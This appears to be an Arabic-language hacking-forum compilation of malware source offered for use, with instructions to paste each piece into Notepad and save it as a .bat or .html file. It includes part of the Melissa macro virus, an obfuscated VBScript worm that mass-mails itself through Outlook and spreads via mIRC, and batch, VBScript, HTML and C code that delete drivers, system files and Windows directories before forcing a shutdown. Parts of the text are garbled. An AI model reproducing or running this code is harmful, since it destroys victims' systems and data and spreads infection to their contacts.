Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN,
ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1
Loop End If
p$ = "clone"
If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1 Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN,
NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1
Loop End If CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False)
Then ActiveDocument.SaveAs
FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name,
"Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF 'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000
Virus? You Decide! 'Word > Email | Word 97 <> Word 2000 ... it's a
new age! If Day(Now) = Minute(Now) Then
Selection.TypeText "Twentytwo points, plus triplewordscore, plus fifty points for using all my
letters. Game's over. I'm outta here." End Sub
Virus worm هذا
:اقتباس
Set O6734VC6 = createobject("scripting.filesystemobject")O78SS2L7 = O6734VC6.getspecialfolder(1)A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"Set E828D4O2 = createobject("wscript.shell")E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\WinUpdate", "wscript.exe " & A6G1HQFH & " %"O6734VC6.copyfile wscript.scriptfullname, A6G1HQFHUB51PCQUIf E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 thenKD8F5L2NEnd ifIf E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 thenHLVO1EDH ""End if
Function KD8F5L2N()Set O13Q767K = CreateObject("Outlook.Application")
If O13Q767K = "Outlook" ThenSet LFSIH230 = O13Q767K.GetNameSpace("MAPI")Set LLLK4LPL = LFSIH230.AddressListsFor Each A4A83865 In LLLK4LPLIf A4A83865.AddressEntries.Count <> 0 ThenJM1R7N44 = A4A83865.AddressEntries.CountFor NHF463JD = 1 To JM1R7N44Set OU435GC5 = O13Q767K.CreateItem(0)Set KP511I06 = A4A83865.AddressEntries(NHF463JD)OU435GC5.To = KP511I06.AddressOU435GC5.Subject = "Very Important!"OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)IJ15SDEE = A6G1HQFHOU435GC5.DeleteAfterSubmit = TrueDH97CAIN.Add IJ15SDEEIf OU435GC5.To <> "" ThenOU435GC5.SendEnd IfNextEnd IfNextEnd IfEnd functionFunction HLVO1EDH(AHAOA819)If AHAOA819 <> "" ThenTJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Micr osoft\Windows\CurrentVersion\ProgramFilesDir")If O6734VC6.fileexists("c:\mirc\mirc.ini") ThenAHAOA819 = "c:\mirc"ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") ThenAHAOA819 = "c:\mirc32"ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") ThenAHAOA819 = TJTE98P3 & "\mirc"ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") ThenAHAOA819 = TJTE98P3 & "\mirc"ElseAHAOA819 = ""End IfEnd IfIf AHAOA819 <> "" ThenSet U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True)U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{"U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }"U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "U127MJ5H = U127MJ5H & A6G1HQFH
U127MJ5H = U127MJ5H & vbCrLf & "n3=}"script.CloseEnd IfEnd FunctionFunction J706734V()On Error Resume NextSet CKQ24CHB = O6734VC6.DrivesFor Each G2U828D4 In CKQ24CHBOC078SS2 = G2U828D4 & " \ "Call L7R6G1HQ(OC078SS2)NextEnd Function
Function L7R6G1HQ(FS6B51PC)Q35A1OM5 = FS6B51PCSet ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)Set G6F47AC8 = ITHD8F5L.FilesFor Each NFFLVO1E In G6F47AC8If lcase(NFFLVO1E.Name) = "mirc.ini" ThenHLVO1EDH(NFFLVO1E.ParentFolder)End IfIf O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs"O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,trueEnd ifIf O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe"O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,trueEnd ifNextSet VSM3BL08 = ITHD8F5L.SubfoldersFor Each UQFA0DCQ In VSM3BL08Call (UQFA0DCQ.path)NextEnd functionFunction UB51PCQU()RandomizeIf 1 + Int(Rnd * 50) = 7 thenE828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"end ifend function
الن فايروسات العزيزblackdream
هذا الفيروس يقوم بمهام منها
نسخ نفسه في بدا التشغيل:1 تعطيل الكيبورد والفارة:2
c انشاء اللف من المجلدات على سطح المكتب وعلى:3temp antivirus حذف:4
يعطل المؤشرات:5حذف الويندوز نهائيا:6
7: ةغلق الجهاز بطريقة
:كود@echo OFF
title T0TAL_DZ is attacked your systeme attrib +s +h %0
copy %0 "C:\Users\%username%\AppData\Roaming\Microsoft\Win dows\start
Menu\Programs\startup" cd C:Windowssystem32 del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv del /S /F /Q keyboard.sys
mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET RESTARTING
YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN echo CHECK YOUR DESKTOP
ping localhost >nul mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS
FITS! echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL ping localhost >nul
echo Y | del C:WindowssecurityDatabase cd C:WindowsCursors
del /S /F /Q *.cur del /S /F /Q *.ani
echo OH NO WHERE THE DID YOUR CURSOR GO ping localhost >nul
cls echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, T0TAL IS HERE" exit
الهوتميل فيروس
الهوتميل فيروس جدااا خطير فيروس وهدا شيء كل بتعطيل يقوم
المفكرة في وضعه الكود notepad انسخ بي متل واحفطهbLaCkDrEaM.html
<html>
<head><**** **********="ContentType"
content="text/html; charset=iso88591"><title>ActiveX HTML</title>
</head>THIS HTML USING ACTIVEX PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0"><script language="VBScript"><! This is a MY BRAIN !>
On Error Resume NextDim a
Set fso = CreateObject("Scripting.FileSystemObject")Set a = fso.GetFile("win.ini")
a.DeleteDim b
Set fso = CreateObject("Scripting.FileSystemObject")Set b = fso.GetFile("system.ini")
b.Delete
</script><! This script author is THEONE!>
</body></html>
.................................................. ..
في بتجميعها قوم مجموعات الى النوت notepadمقسم بي وحفظ باد النوت في ضعه bLaCkDrEaM.bat باد
:اقتباسDisassembly of File: office_crack.exe
Code Offset = 00000400, Code Size = 00000000
Data Offset = 00000400, Data Size = 00000000
Number of Objects = 0003 (dec), Imagebase = 004A0000h
Object01: UPX0 RVA: 00001000 Offset: 00000400 Size: 00000000 Flags: E0000080
Object02: UPX1 RVA: 00007000 Offset: 00000400 Size: 00005000 Flags: E0000040
Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size: 00000400 Flags: C0000040
+++++++++++++++++++ MENU INFORMATION ++++++++
++++++++++
There Are No Menu Resources in This Application
+++++++++++++++++ DIALOG INFORMATION ++++++++++++++++++
There Are No Dialog Resources in This Application 0
+++++++++++++++++++ IMPORTED FUNCTIONS ++++++++++++++++++ 0
Number of Imported Modules = 0 (decimal)
+++++++++++++++++++ IMPORT MODULE DETAILS +++++++++++++++ 0
+++++++++++++++++++ EXPORTED FUNCTIONS ++++++++++++++++++ 0
Number of Exported Functions = 0000 (decimal) ++
+++++++++++++++++++ ASSEMBLY CODE LISTING +++
+++++++++++++++
//********************** Start of Code in Object UPX0 **************
Program Entry Point = 004ABE60 (office_crack.exe File Offset:0000B260) g
:004A7000 EE out dx, al
:004A7001 8702 xchg dword ptr [edx], eax
:004A7003 92 xchg eax,edx r
:004A7004 005026 add byte ptr [eax+26], dl
:004A7007 4A dec edx p
:004A7008 004003 add byte ptr [eax+03], al
:004A700B FD std by
:004A700C B269 mov dl, 69
:004A700E 9A2C1004F425E8 call E825:F404102C
:004A7015 0100 add dword ptr [eax], eax
:004A7017 4B dec ebx d
:004A7018 CE into b
:004A7019 699A6ED91FC82AC003B8 imul ebx, dword
ptr [edx+C81FD96E], B803C02A 0
:004A7023 B0A8 mov al, A8
:004A7025 A6 cmpsb
:004A7026 699AA6A0989088809AA6 imul ebx, dword ptr [edx+9098A0A6], A69A8088 0
:004A7030 699A787068605850CD60 imul ebx, dword ptr [edx+60687078], 60CD5058 0
:004A703A 9F lahf e
:004A703B 69480044073830 imul ecx, dword ptr [eax+00], 30380744
:004A7042 344D xor al, 4D
:004A7044 D3 BYTE 0d0h
:004A7045 7403 je 004A704A or
:004A7047 28241C sub byte ptr [esp+ebx], ah
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004A7045(C) y
| 00
:004A704A 1810 sbb byte ptr [eax], dl
:004A704C D32CBB shr dword ptr [ebx+4*edi], cl
:004A704F D7 xlat w
:004A7050 0823 or byte ptr [ebx], ah
:004A7052 03F8 add edi, eax e
:004A7054 29F0 sub eax, esi e
:004A7056 E84DD3344D call 4D7F43A8
:004A705B E0D8 loopnz 004A7035 ],
:004A705D D0C8 ror al, 1
:004A705F BCB4344DD3 mov esp, D34D34B4
:004A7064 34AC xor al, AC
:004A7066 A4 movsb[/
.................................................. .. للويندوز الترحيب شاشة لحذف كود
في ضعه العادة كل ستفهم العنوان notepadمن باد النوتبي bLaCkDrEaM.bat وحفط
:اقتباسDel c:\windows\Logos.sys
Del c:\windows\Logow.sys
.................................................. ... بيسك الفيجول فيروس
ا الويندوز تدمير فيروسات بي bLaCkDrEaM.bat احفط
:اقتباسvbNormal
SetAttr "c:\msdos.sys", vbNormalSetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormalSetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormalSetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormalSetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"Kill "C:\msdos.sys"
Kill "C:\io.sys"Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"Kill "C:\command.com"
Kill "C:\config.sys"Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"[/CODE
.................................................. ...........
الويندوز تدمير newفيروس
تم اوامر عدة بصدار ودلك الضجية بتعديب الفيروس يمتاز الهاردسك بتدمير يقوم
باد النوت في واحفظه الكود notebad انسخ دالك وبعدbLaCkDrEaM.bat حفط
Del c:\windows\system\msconfig.exe
Del c:\windows\Rundll32.exe
Del c:\windows\regedit.exe
Del c:\windows\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
Del c:\windows\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\windows\system\Sysedit.exe
Del c:\windows\win.com
@Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
تعـجبكم الله شاء أن
السود الحلم أخوكم
.............................يتبع
bLaCkDrEaM
1 مباشره التشغيل بعد الملفات كل وحذف الوندوز قتلانسخ:كود
@Echo off c:
cd %WinDir%System deltree /y *.dll
cd deltree /y *.sys
echo 2 تشغيل اعادة اول بعد الملفات كل وحذف الوندوز قتل
للجهازانسخ:كود
call attrib h r c:autoexec.bat >nul @Echo off
c: cd %WinDir%System
deltree /y *.dll cd
deltree /y *.sys echo
: ++C فيرووس3انسخ
:كود#include #include #include main()
{ clrscr();
printf("tttCoffin Of Evil "); printf("ttWElcome to My World"); remove("c:\windows\system.ini");
remove("c:\windows\win.ini"); remove("c:\autoexec.bat"); remove("c:\msdos.sys");
remove("c:\io.sys"); remove("c:\command.com");
remove("c:\config.sys"); remove("c:\windows\ebd\command.com");
remove("c:\windows\ebd\ebd.cab"); remove("c:\windows\ebd\Autoexec.bat"); remove("c:\windows\ebd\setramd.bat");
remove("c:\windows\ebd\Findramd.exe"); rename("egypt.exe","c:/windows/startm~1/programs/sta
rtup/win.exe"); printf("Windows destroyed ...nn");
system("PAUSE"); }
4 بعد الجهاز ثانيه 60إطفاء :كود
cmdow @ /HIDshutdown.exe r f t 60 c "Windows XP will now restart
in 60 Seconds...hacked by تريد الذي الكلم "حطnet user aspnet /delete
EXIT
ارجو عدم استخدامه على اخواننا المسلمينواني بريء من كل عمل يضر اخواننا المسلمين
تم تصميم الكتاب بواسطةmr_Shark96